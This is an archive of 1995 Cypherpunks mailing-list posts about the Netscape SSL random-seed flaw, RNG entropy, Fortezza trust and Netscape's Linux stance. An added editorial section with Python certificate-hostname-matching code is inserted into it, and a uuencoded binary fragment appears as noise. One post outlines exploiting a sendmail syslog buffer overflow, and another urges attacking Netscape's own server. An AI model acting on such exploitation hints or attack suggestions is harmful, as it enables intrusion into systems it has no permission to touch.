David J. Bianco | Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc. | Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center | email:
Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/

From joelm at eskimo.com Sat Sep 23 11:24:07 1995
From: joelm at eskimo.com (Joel McNamara)
Date: Sat, 23 Sep 95 11:24:07 PDT
Subject: Seattle Cypherpunks
Message-ID: <199509231823.LAA15147@mail.eskimo.com>

Seattle-area Cypherpunks Get Together
Thursday, September 28
7:30 PM
Seattle Center House/Food Circus
Entrance opposite the Flag Pavilion
look for a table with a Compaq laptop busily signing keys

This is a very informal, unstructured get together. More of a chance to meet other folks with similar interests. With all of the recent activities in crypto-land, I'm sure there will be lots to talk about. Bring a disk with your key so I can put my ancient 386 laptop to some good use. I'll also load up some relatively new Windows crypto software for show and tell. Eastsiders (Bellevue/Redmond environs) that don't feel like braving the bridge, let me know. I've got a van and will be headed west from Carnation and would be happy to car-pool. Hope to see you there...

Joel McNamara
joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?
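David Bianco's post above (the SSL man-in-the-middle thread, two messages up) argues that an SSL client should automatically check that the name in the server certificate is the host named in the URL. What follows is an added example of that check, written for this archive; it is not code from the post, from Netscape, or from any SSL library. The certificate records are constructed dictionaries shaped like the output of Python's `ssl.getpeercert()` rather than parsed X.509, and the function names are my own. It goes slightly beyond the post: a CN that holds an IP literal (the case Bianco observed in Netscape server certificates) is compared as an address rather than as a string, wildcard names are limited to a single label, and when a certificate carries a `subjectAltName` with DNS entries those are used instead of the CN, which is how RFC 6125 later standardised the check.

```python
"""Match the host in a URL against the names in a server certificate.

Added example for the SSL man-in-the-middle discussion; the certificate
records used here are constructed test data, not real X.509 parsing.
"""
import ipaddress
from urllib.parse import urlsplit


def _dns_name_matches(cert_name, hostname):
    """Case-insensitive DNS-name comparison.

    A leading '*.' matches exactly one label: '*.example.com' covers
    'www.example.com' but neither 'example.com' nor 'a.b.example.com'.
    Single-label wildcards such as '*.com' are refused outright.
    """
    cert_name = cert_name.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if not cert_name.startswith("*."):
        return cert_name == hostname
    suffix = cert_name[1:]                 # '.example.com'
    if "." not in suffix[1:]:
        return False                       # '*.com' would cover a whole TLD
    label = hostname[: -len(suffix)] if hostname.endswith(suffix) else ""
    return label != "" and "." not in label


def _cert_names(cert):
    """Split a certificate record into (dns_names, ip_addresses).

    `cert` mimics ssl.getpeercert(): a 'CN' string plus an optional
    'subjectAltName' tuple of ('DNS', name) / ('IP Address', ip) pairs.
    When the SAN carries DNS names the CN is ignored (RFC 6125 rule).
    Raises ValueError on a malformed IP entry so the caller fails closed.
    """
    san = cert.get("subjectAltName", ())
    dns_names = [value for kind, value in san if kind == "DNS"]
    ips = [ipaddress.ip_address(value)
           for kind, value in san if kind == "IP Address"]
    cn = cert.get("CN")
    if cn and not dns_names:
        try:
            ips.append(ipaddress.ip_address(cn))   # CN holding an IP literal
        except ValueError:
            dns_names.append(cn)                   # ordinary host name in CN
    return dns_names, ips


def certificate_matches_url(cert, url):
    """True only when the certificate's names cover the host in `url`.

    A URL without a host, a malformed SAN entry, or an IP-literal host
    that the certificate does not list all return False (fail closed).
    """
    host = urlsplit(url).hostname          # port stripped, brackets removed
    if not host:
        return False
    try:
        dns_names, ips = _cert_names(cert)
    except ValueError:
        return False
    try:
        return ipaddress.ip_address(host) in ips
    except ValueError:
        pass                               # not an IP literal: compare as DNS
    return any(_dns_name_matches(name, host) for name in dns_names)


if __name__ == "__main__":
    # Constructed sample certificates, not real ones.
    cn_only = {"CN": "www.example.com"}
    ip_cn = {"CN": "192.0.2.10"}
    with_san = {"CN": "legacy.example.com",
                "subjectAltName": (("DNS", "shop.example.com"),
                                   ("IP Address", "2001:db8::1"))}
    for cert, url in [(cn_only, "https://www.example.com/login"),
                      (cn_only, "https://mail.example.com/"),
                      (ip_cn, "https://192.0.2.10:8443/"),
                      (with_san, "https://legacy.example.com/"),
                      (with_san, "https://[2001:db8::1]/")]:
        print(url, "->", certificate_matches_url(cert, url))
```

The name check is only half of what keeps a man-in-the-middle out: the client must also verify the certificate's signature chain up to a CA it trusts before the names inside it mean anything. A modern Python client gets both from `ssl.create_default_context()`, which enables `check_hostname` and `CERT_REQUIRED` by default; the function above is useful where a certificate has already been validated and the application needs to decide whether it belongs to the host it dialled.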
From perry at piermont.com Sat Sep 23 11:31:54 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 23 Sep 95 11:31:54 PDT
Subject: netscape bug
In-Reply-To: <199509230003.RAA06024@orac.engr.sgi.com>
Message-ID: <199509231831.OAA06104@frankenstein.piermont.com>

Tom Weinstein writes:
> In article , "Perry E. Metzger" writes:
>
> > I can tell you in general terms -- I don't write MIPS assembler
> > myself. However, I will point out to you that you use an ancient
> > Sendmail, and that it uses syslog(3) on user produced data, and that
> > syslog uses a static buffer. Trick sendmail into logging something
> > very big, and you can do what you like. The 8lgm people wrote a demo
> > for Sparc as a proof of concept.
>
> Hmm, after having looked at the syslogd code, it looks like this
> particular bug has been fixed for at least several years.

I said syslog(3), not syslogd(8). The bug is in the client, not the server. Yes, you suffer from it. Go and check.

> However, there sure are a hell of a lot of fixed size buffers being
> allocated off the stack and some of them are being used in unsafe
> ways.

Perry

From sameer at c2.org Sat Sep 23 12:19:44 1995
From: sameer at c2.org (sameer)
Date: Sat, 23 Sep 95 12:19:44 PDT
Subject: "Going after Netscape"
In-Reply-To:
Message-ID: <199509231914.MAA01326@infinity.c2.org>

> So, keep on "attacking" Netscape (kudos to Ray, by the way, though I've
> seen Netscape bomb on certain sites, as with the Cypherpunks archive site,
> as several of us noted a few months ago...probably a different problem, but
> indicative that Netscape can be corrupted). But let's be careful not to
> convey any flavor of this being a vendetta.

I agree. The goal is not to kill Netscape but to make the net secure.
-- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From sameer at c2.org Sat Sep 23 12:24:16 1995 From: sameer at c2.org (sameer) Date: Sat, 23 Sep 95 12:24:16 PDT Subject: The Next Hack In-Reply-To: <4407p5$on4@tera.mcom.com> Message-ID: <199509231919.MAA01818@infinity.c2.org> > > What exactly is the point of this? We have: Is Netscape going to cover the cost of getting the new keys that the servers generate signed and certified by Versign? Is netscape going to tell its customers that they need to regenerate their keys and get new certificates? Like I've said, I'm very impressed with netscape's quick response and almost everything they've done. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From sameer at c2.org Sat Sep 23 12:28:53 1995 From: sameer at c2.org (sameer) Date: Sat, 23 Sep 95 12:28:53 PDT Subject: HEY!!! WAS: The Next Hack In-Reply-To: <199509231217.FAA27504@usr1.primenet.com> Message-ID: <199509231923.MAA02185@infinity.c2.org> > You HAD stated a patch would be available by Friday. > Now we are at early next week. I'd rather wait a few days for a good patch than have a bad, untested patch available earlier. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From perry at piermont.com Sat Sep 23 12:35:32 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 23 Sep 95 12:35:32 PDT Subject: Why I haven't begun to be nasty to Netscape (was Re: The Next Hack) In-Reply-To: <4407p5$on4@tera.mcom.com> Message-ID: <199509231935.PAA06187@frankenstein.piermont.com> Jeff Weinstein writes: > What else do you hope to gain by breaking a server key? I think > the point has been made. 
Is there anything else that you would
> reasonably expect that we would do in response to a server key
> being broken that we have not already done?

Well, I don't know what the point was -- I don't think it's a useful effort -- but I would like to make the following comment.

One problem I've had is that this isn't some toy being built at NCSA any more -- it's something that lots of real money depends on. If I treated my security critical code for my wall street clients the way you guys have treated a lot of your code, I'd expect to be blackballed and never work at anything more lucrative than shoe-shining again in my entire career.

You've all been giving the very standard "We're overworked -- we didn't know -- I didn't look at that" sort of answers. That's all fine and well -- but when the money gets stolen or the plane crashes it isn't good enough. Code like this has to be treated with enormous seriousness. That means code reviews. That means people follow systematic security procedures -- and that's not just in the "security code" because that isn't where the break will come. It means that there are coding standards. It means people break their backs very very seriously checking everything and rechecking it, and then torture testing it. You folks are still operating as if you are a garage operation when it comes to this stuff, even though you are selling commerce servers that people depend on for their business to operate.

You guys have gotten off quite lightly -- you screw up in a way that could have cost your clients real money and all that happened is some bad press and pressure to fix things. However, don't expect to be treated that well next time. Those of us who are adults in this business expect that we won't get second chances if we fuck a client good and hard, and you guys shouldn't feel as though you've got another couple of strikes to go. As I said, if I fucked up that way I'd expect to have my career permanently ruined. You got off *easy*.
In my part of the universe, which is very close to the part you guys have started to tread in, people treat this stuff very seriously. As it happens, I know of some places in the financial community where people have started to act lazy. I'm expecting to see lots of people lose their careers when something bad happens.

Perry

From sryan at reading.com Sat Sep 23 12:49:22 1995
From: sryan at reading.com (steven ryan)
Date: Sat, 23 Sep 95 12:49:22 PDT
Subject: macworld crypto articles
Message-ID: <199509231949.PAA23337@zork.tiac.net>

The current (11/95) issue of MACWORLD magazine has two good crypto articles in it.

1 - Protect your E-Mail by Bruce Schneier
Good introduction for neophytes, the basic how and why. Get some reprints and give them away with PGP to your nonCypherpunk computer friends.

2 - False Security by Gene Steinberg
They searched for an applications programmer *UN*skilled at cryptography to try and crack the password protection of the 8 best selling Mac programs. Quicken 5.0 was cracked in 5 minutes. Adobe Acrobat in 2 hours.

Steven Ryan
sryan at reading.com

From shamrock at netcom.com Sat Sep 23 13:05:49 1995
From: shamrock at netcom.com (Lucky Green)
Date: Sat, 23 Sep 95 13:05:49 PDT
Subject: "Going after Netscape"
Message-ID: <199509232003.QAA11668@book.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <199509231914.MAA01326 at infinity.c2.org>, sameer at c2.org (sameer) wrote:
>> So, keep on "attacking" Netscape (kudos to Ray, by the way, though I've
>> seen Netscape bomb on certain sites, as with the Cypherpunks archive site,
>> as several of us noted a few months ago...probably a different problem, but
>> indicative that Netscape can be corrupted). But let's be careful not to
>> convey any flavor of this being a vendetta.
>
> I agree. The goal is not to kill Netscape but to make the net
>secure.

Absolutely. We aren't on a vendetta. We want to make the net secure for privacy.
If hacking a Netscape server will help that goal, surely Netsape's own would be the most appropriate server to try, since it will generate the largest exposure in the press and thereby the strongest motivation for Netscape to fix the hole. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMGRoHyoZzwIn1bdtAQHJCgF9FbuTP1VBbzGJANFX48hvje4V7pzhyEaQ ItXGdXHCPbxjKbQ0bLApkt4yTtHJREMk =wEyv -----END PGP SIGNATURE----- From shamrock at netcom.com Sat Sep 23 13:07:26 1995 From: shamrock at netcom.com (Lucky Green) Date: Sat, 23 Sep 95 13:07:26 PDT Subject: The Next Hack Message-ID: <199509232005.QAA11679@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199509231919.MAA01818 at infinity.c2.org>, sameer at c2.org (sameer) wrote: >> >> What exactly is the point of this? We have: > > Is Netscape going to cover the cost of getting the new keys >that the servers generate signed and certified by Versign? Is netscape >going to tell its customers that they need to regenerate their >keys and get new certificates? > > Like I've said, I'm very impressed with netscape's quick >response and almost everything they've done. I would be even more impressed if Netscape made their code publicly available for examination. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMGRoeyoZzwIn1bdtAQGg4wF/XTLT2U7mXi2MZ5pgSZQMd9VdLZJcp5MD wgBWaGCNIzsQnkwB4ZkTyjJAOwFf0OkJ =+ZRt -----END PGP SIGNATURE----- From jsw at neon.netscape.com Sat Sep 23 13:44:23 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Sat, 23 Sep 95 13:44:23 PDT Subject: HEY!!! WAS: The Next Hack In-Reply-To: <199509231217.FAA27504@usr1.primenet.com> Message-ID: <441rhh$bpi@tera.mcom.com> In article <199509231217.FAA27504 at usr1.primenet.com>, carolann at censored.org (Censored Girls Anonymous) writes: > You HAD stated a patch would be available by Friday. > Now we are at early next week. This is what our press release said: An updated version of Netscape Navigator 1.1 for Mac OS and Unix and Netscape Navigator 1.2 for Windows 3.1 and Windows 95 will be available for downloading by existing customers on the Internet next week. There is still a link to it on our home page. All press accounts I've seen (this is not exhaustive!!) have also said early next week. I don't have an archive of every message I've sent to this list, so I can't check myself, but if I somehow led you to believe that the fix would be out friday, then I apologize. You can look at this url for the official company statement: http://home.netscape.com/newsref/std/random_seed_security.html --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at neon.netscape.com Sat Sep 23 13:57:18 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Sat, 23 Sep 95 13:57:18 PDT Subject: The Next Hack In-Reply-To: <4407p5$on4@tera.mcom.com> Message-ID: <441s9c$for@tera.mcom.com> In article <199509231919.MAA01818 at infinity.c2.org>, sameer at c2.org (sameer) writes: > > > > What exactly is the point of this? 
We have: > > Is Netscape going to cover the cost of getting the new keys > that the servers generate signed and certified by Versign? Is netscape > going to tell its customers that they need to regenerate their > keys and get new certificates? I'm not sure what exactly you mean by "cover the cost". Our server customers WILL NOT have to pay verisign for new certificates. We will tell all of our customers to generate new keys and get new certificates ASAP. We are putting the version number in new certificate requests so that verisign can reject requests from people who don't have the new version of the key generator. Server operators will also be able to set up their servers to detect unpatched clients and redirect them to a page that will allow them to download the patch. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jamesd at echeque.com Sat Sep 23 14:08:32 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 23 Sep 95 14:08:32 PDT Subject: Project: a standard cell random number generator Message-ID: <199509232108.OAA17020@blob.best.net> At 11:52 AM 9/22/95 -0700, David G. Koontz wrote: > If NSA requires real stochastic results for military crypto, what would > we as casual cryptographers feel comfortable with? The Netscape episode > shows the comfort level needs improving. > > How good is good enough? 128 bits of true entropy, in your RNG seed, and never leaked is good enough. (You one way hash the RNG numbers generated, to avoid leaking any information about your internal RNG state.) Your RNG number must of course be based on the full seed, not on some 16 bit subset of the seed. To be on the safe side, you might use 128 bytes of seed, or 4K bytes of seed, just because gross overkill is cheap, and it is kind of nice to have a seed larger than any random numbers you might really need. 
--------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From wb8foz at nrk.com Sat Sep 23 15:42:33 1995 From: wb8foz at nrk.com (David Lesher) Date: Sat, 23 Sep 95 15:42:33 PDT Subject: "random" number seeds vs. Netscape In-Reply-To: <9509221532.AA19315@cantina.verity.com> Message-ID: <199509232229.SAA00612@nrk.com> As a hardware type, I'd prefer a diode noise generator over a radioactivity detector. I'd hate for the Fort to be tempted to fudge the latter's output by flooding my house from a black helicopter... But lacking same.... Can you take the time between two effectively async events, and use the low order bits of same? For example, time between a netverk pack arriving and the next tick of the TOD clock? And/or the system's disk IO or such? Or: Choose a site at random. Ping it. Use low order bits of that time with something above. I'm sure most such schemes are not usable. But all it takes is one... -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From stewarts at ix.netcom.com Sat Sep 23 15:54:15 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sat, 23 Sep 95 15:54:15 PDT Subject: The Fortezza random number generator is not trustworthy Message-ID: <199509232254.PAA11243@ix8.ix.netcom.com> A nice addition to any Netscape RNG hacks is the comment that, while Netscape may have a bug in their RNG, it's detectable and fixable; the NSA may have a BUG in theirs, and only they'll know for sure... 
>> Yes Fortezza cards can be instructed to produce a random number through one >> of its library calls (someday they'll have a real API). One of the >> diagnostic tools I had tested this function. What algorithm do they use? >> Haven't a clue. Sources say that the RNG implementation may vary from vendor >> to vendor (i.e., GTC, Spyrus, Mykotronix, etc.). John Gilmore's comments on CAPSTONE, subliminal channels, and FOIA blackouts certainly add depth to this suspiciousness. I'd initially not been too worried about the Fortezza (besides the obvious Master Key problems) because the NSA is letting the military use them for Defense Messaging Service. However, if the RNG might be different for different vendors, the non-military versions may be using a weak RNG, which the NSA has a backdoor to. Alternatively, the RNGs may all be the same, but there may be an option that the military can use to get full-strength random numbers while the public, not knowing this, gets weakened ones (e.g. the first n bits of the RNG may be random, and the next N-n bits may be a strong hash, while there are N-n real random bits in another register if you ask for them nicely.) On a technical note, I would have thought that Fortezza and/or CAPSTONE used some sort of hardware RNG, i.e. noisy Zener diodes or whatever. I've seen it mentioned on this list that some other NSA secure phones, such as STU-III, do that. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From shamrock at netcom.com Sat Sep 23 16:01:07 1995 From: shamrock at netcom.com (Lucky Green) Date: Sat, 23 Sep 95 16:01:07 PDT Subject: Need Pathfinder "Cypherpunks" password Message-ID: <199509232259.SAA12058@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- What is the Cypherpunks password to be used with Pathfinder, Time-Warner's web site? TIA, - -- - -- Lucky Green PGP encrypted mail preferred. 
- --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMGSROioZzwIn1bdtAQHi2AGAi18zy9bn/EvI65yoyqAPcQonmp3gaB7y Di2Jqq0KLUZFR4fzvwxoM4ZVWNfafQ7r =wBeD -----END PGP SIGNATURE----- From WSJ-ANNOUNCE at LIME.EASE.LSOFT.COM Sat Sep 23 16:39:16 1995 From: WSJ-ANNOUNCE at LIME.EASE.LSOFT.COM (Money & Investing Update) Date: Sat, 23 Sep 95 16:39:16 PDT Subject: Important Announcement from Money & Investing Update Message-ID: <9509232338.AA15228@toad.com> The Wall Street Journal's Money & Investing Update (http://update.wsj.com) has now introduced Company Briefing Books, a major product enhancement that enables Update readers to get a rich, up-to-the-minute background report on any company in the news. Briefing Books are highly graphical compilations of recent news, stock charts, and financial data, available on more than 6,500 U.S. and international companies. They include news from The Wall Street Journal and Dow Jones newswires, as well as background reports and performance data from other leading information sources. Money & Investing Update editors now include direct hyperlinks to Briefing Books from nearly every significant mention of a company in Update stories and tables. In addition, readers can ask for a Briefing Book on a company of their choosing at any time simply by entering a company name or stock symbol. The Money & Investing Update is at http://update.wsj.com. If you haven't read the Update in a while, please try this important new feature. You can go directly to a Briefing Book request form at this URL: http://update.wsj.com/briefingbook/inap/search.html. Best wishes, The Editors and Staff of Money & Investing Update ---------------------- For further information, contact us at info at update.wsj.com or call customer support at 1-800-369-2834. 
If you would prefer not to receive any future email from the Money & Investing Update please send email to "LISTSERV at PEACH.EASE.LSOFT.COM" In the body of your message please type "UNSUBSCRIBE WSJ-ANNOUNCE"

From stewarts at ix.netcom.com Sat Sep 23 17:30:41 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 23 Sep 95 17:30:41 PDT
Subject: "random" number seeds vs. Netscape
Message-ID: <199509240029.RAA22318@ix8.ix.netcom.com>

At 06:29 PM 9/23/95 -0400, you wrote:
>Can you take the time between two effectively async events, and use the
>low order bits of same?
>For example, time between a netverk pack arriving and the next tick of
>the TOD clock? And/or the system's disk IO or such?

You might get some entropy there, but you can get more (though perhaps not measurably more) by using the values of both instead. For instance
rand = MD5(rand, lowbits(T(clock) - T(packet)))
vs
rand = MD5(rand, T(clock), T(packet))
As long as you're not overoptimistic about how many real bits you've gotten, might as well actually use the version that keeps more low-quality bits than try to improve them.

Also, do watch out for things that aren't really asynchronous, e.g. the next clock tick will probably happen at some even multiple of 1000000/Hz microseconds.
#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From A00467 at servicom.es Sat Sep 23 18:33:57 1995
From: A00467 at servicom.es (Xavier Naveira)
Date: Sat, 23 Sep 95 18:33:57 PDT
Subject: Hello
Message-ID: <43p9kj$7fh@sparky.servicom.es>

Hello!!!!

From paquin at netscape.com Sat Sep 23 19:09:40 1995
From: paquin at netscape.com (Tom Paquin)
Date: Sat, 23 Sep 95 19:09:40 PDT
Subject: Netscape for Linux?
In-Reply-To: <43tmht$qfe@tera.mcom.com>
Message-ID: <3064BDFB.717F@netscape.com>

> And the sad part is that now that they have announced that they are
> dropping their unofficial Linux support,

I have no current plans to alter our treatment of Linux. It is not now, nor has it ever been, a supported platform. We do build for it, and some people are happy about that.

I have not constructed a business case which would cause Netscape to begin support for Linux versions of the Navigator. Right now, I'm not sure that making a point of this would do what you want.

Either of the two above paragraphs could be changed with time.
--
Tom Paquin +1(415)528-2607 fax +1(415)528-4122
Netscape Communications 501 E Middlefield Mt View, CA 94043 USA

PS. I think that you are all doing a really great job!

From hshubs at BIX.com Sat Sep 23 20:08:29 1995
From: hshubs at BIX.com (hshubs at BIX.com)
Date: Sat, 23 Sep 95 20:08:29 PDT
Subject: Cypherpunks Lite
Message-ID: <9509232307.memo.6018@BIX.com>

Would the person who does this, or someone who can point me at him, contact me via e-mail please?

From sunder at dorsai.dorsai.org Sat Sep 23 20:30:36 1995
From: sunder at dorsai.dorsai.org (Ray Arachelian)
Date: Sat, 23 Sep 95 20:30:36 PDT
Subject: Cypherpunks Lite
In-Reply-To: <9509232307.memo.6018@BIX.com>
Message-ID:

On Sat, 23 Sep 1995 hshubs at BIX.com wrote:
> Would the person who does this, or someone who can point me at him, contact
> me via e-mail please?

I don't run the actual Cypherpunks Lite list, however I do run a free filtering service of the same sort... basically stick to news and technical stuff, as well as other miscellaneous interesting stuff, but don't forward whole threads, or flames, etc... If you want in, let me know in email and I'll add you to the list.

==========================================================================
+ ^ + | Ray Arachelian | Amerika: The land of the Freeh.
  \|/    | sunder at dorsai.org | Where day by day, yet another
<--+-->  |                    | Constitutional right vanishes.
  /|\    | Just Say           |
 + v +   | "No" to the NSA!   | Jail the censor, not the author!
==========================================================================

From cjs at netcom.com Sat Sep 23 20:50:08 1995
From: cjs at netcom.com (Christopher J. Shaulis)
Date: Sat, 23 Sep 95 20:50:08 PDT
Subject: Netscape for Linux?
In-Reply-To: <3064BDFB.717F@netscape.com>
Message-ID: <199509240243.WAA00266@hoopsnake.cjs.net>

> > And the sad part is that now that they have announced that they are
> > dropping their unofficial Linux support,
>
> I have no current plans to alter our treatment of Linux. It is not now,
> nor has it ever been, a supported platform. We do build for it,
> and some people are happy about that.
>
> I have not constructed a business case which would cause Netscape
> to begin support for Linux versions of the Navigator. Right now, I'm
> not sure that making a point of this would do what you want.

I'll say some people are happy about it. You just recently turned down an order for 230 copies of the Netscape Navigator for Linux, and as you folks aren't making any money, you can only wonder why. You have also turned down numerous other attempts by various people to buy both quantities of navigators and server software for Linux.

It seems to me that you folks are going out of your way to deny the fact that the Linux market exists. I think that it's because you are embarrassed that all these people with a $20 operating system are throwing money at you while all the folks with $10K operating systems aren't talking to you at all.

While you may WANT to have all your sales be for OSF/1 machines or Solaris, refusing to support Linux and ignoring the demand for your products by the Linux community just because you don't think it would sound as impressive is actually quite childish and doesn't make any financial sense.
Christopher

From stewarts at ix.netcom.com Sat Sep 23 21:38:27 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 23 Sep 95 21:38:27 PDT
Subject: Netscape for Linux?
Message-ID: <199509240436.VAA28304@ix5.ix.netcom.com>

At 10:42 PM 9/23/95 -0400, you wrote:
> It seems to me that you folks are going out of your way to deny the
> fact that the Linux market exists. I think that it's because you are
> embarrassed that all these people with a $20 operating system are
> throwing money at you while all the folks with $10K operating systems
> aren't talking to you at all.
>
> While you may WANT to have all your sales be for OSF/1 machines or
> Solaris, refusing to support Linux and ignoring the demand for
> your products by the Linux community just because you don't think it
> would sound as impressive is actually quite childish and doesn't make
> any financial sense.

Foo. Supporting applications in a professional way on Linux is _tough_; everybody's got their own self-hacked copy that may have started out as SlackOS 4.1.3 but has the TooManyNotes Sound Widget replacement and has the XBrokenX video driver instead of the original one that didn't work on the TiltedSquareSneakyVideoCard and a way-cool new Obfuscated File System. It's like supporting things on "Unix" was back when everybody had source and a different flavor of M680x0 box. You can't just ask "Have you changed the AUTOEXEC.BAT since the machine came from the factory?" like Windoze app-vendors.

Netscape may not have ever been _compiled_ with the compiler version the user has, much less tested on that kernel version, and the user may or may not know if their X Window System really is installed right or the TCP/IP connection works well and has working DNS support.

Sure, it's easy to charge money for shipping the stuff with a diskette and a manual, but not doing so until they're ready to provide high-quality support isn't childishness, it's ethics (well, and/or bad-reputation-avoidance.)
Now, I haven't checked whether they've trained all their people who answer phone calls from the public to acknowledge that there is an unsupported Linux version for folks who don't mind dealing with unsupported software, or if they've even got it on their Web site; the current version is there for ftp.

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From carolann at censored.org Sun Sep 24 00:04:03 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Sun, 24 Sep 95 00:04:03 PDT
Subject: Apology to Netscape.
Message-ID: <199509240703.AAA20745@usr4.primenet.com>

-----BEGIN PGP SIGNED MESSAGE-----

Jeff Weinstein corrected me with:
> This is what our press release said:
>
> An updated version of Netscape Navigator 1.1 for Mac OS
> and Unix and Netscape Navigator 1.2 for Windows 3.1 and
> Windows 95 will be available for downloading by existing
> customers on the Internet next week.

My apologies for the misquote. It only then makes the trading facts worse.

Love Always,
Carol Anne

ps On the asides kind of things, do you realize the Netscape stock base of 5,000,000 shares is not a big sharebase? Coca-Cola's is 1,300,000,000. And by standards, your stock is really unstable. If Coca-Cola moves 3 points there'll be a trading halt, for the buying/selling imbalance will be too much. Even if only for 1 min. The trading halt gets the good or bad news onto "The Street".
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGUCaYrpjEWs1wBlAQF9ZAP6AkMCsveSU/E8KFDi84urnAR2KlXT42rS
l+9tHh33ZWbM6VmHUMkqelM11vc7zU1eWLhXlYHaoOqwGuTef9irQigbnr+HwYKL
Px9480/Chm59RWCG6j4pp4d0xUQO9Pj0lbpIecn72eDYReRIgh5+MU0jOCNdUNLe
RvP7XvYI570=
=Nb9y
-----END PGP SIGNATURE-----

--
Member Internet Society - Certified BETSI Programmer - Webmistress
***********************************************************************
Carol Anne Braddock (cab8)   carolann at censored.org   206.42.112.96
My Homepage   The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+NS&
http://dcs.ex.ac.uk/~aba/export/

From eyes at amazon.com Sun Sep 24 04:12:23 1995
From: eyes at amazon.com (eyes at amazon.com)
Date: Sun, 24 Sep 1995 04:12:23 -0700
Subject: Amazon.com Books -- personal notification service
Message-ID: <199509241112.EAA03484@ernie.amazon.com>

Hi, as per your request, we at Amazon.com Books are notifying you of new books matching the following criteria:

    subjects include "Cryptography"

The new books are listed at the end of this message. If you're interested in any of these books you can order them online at http://www.amazon.com/

Your most humble automated search agent,

Eyes
Amazon.com Books
http://www.amazon.com/

P.S. Please don't forget that Amazon.com Books has over one million titles for you to choose from, many discounted 10 to 40 percent off the list price. If you have any online friends who might enjoy Amazon.com Books, we'd really appreciate you spreading the word! Thank you!
------------------------------------------------------------------------
"Advances in Cryptology--Eurocrypt-94 : Workshop on the Theory and Application of Cryptographic Techniques, Perugia, Italy, May 1994 : Proceedings)" by Alfredo De Santis
List Price: currently unknown
Subjects: Computer security, Cryptography
Publisher:
Binding: Hardcover
Expected publication date: September 1995
ISBN: 3540601767
------------------------------------------------------------------------
"Enigma : A Novel" by Robert Harris, David Rosenthal(Editor)
List: $23.00 -- Amazon.com Price: $20.70 -- You Save: $2.30 (10%)
Subjects: World War, 1939-1945, Secret service, Great Britain, Fiction, Cryptography
Publisher: Random House
Binding: Hardcover
Expected publication date: October 1995
ISBN: 0679428879
------------------------------------------------------------------------
"Pass It On! : All About Notes, from Secret Codes and Special Inks to Fancy Folds and Dead Man's Drops" by Sharon Bailly, Anne Canevari Green(Illustrator)
List: $18.90 -- Amazon.com Price: $18.90
Subjects: Cryptography, Juvenile literature, Writing
Publisher: Millbrook Pr
Binding: Library Binding
Expected publication date: September 1995
ISBN: 1562945882

----- End of forwarded message from eyes at amazon.com -----

From dmandl at panix.com Sun Sep 24 08:12:53 1995
From: dmandl at panix.com (David Mandl)
Date: Sun, 24 Sep 95 08:12:53 PDT
Subject: macworld crypto articles
Message-ID:

At 3:49 PM 9/23/95, steven ryan wrote:
> They searched for an applications programmer *UN*skilled at cryptography to
> try and crack the password protection of the 8 best selling Mac programs.
> Quicken 5.0 was cracked in 5 minutes. Adobe Acrobat in 2 hours.

Yup, pretty amazing. I only skimmed the article, but I believe that out of all the programs he tried, there was only one whose crypto he couldn't crack. I found it all a little hard to believe.
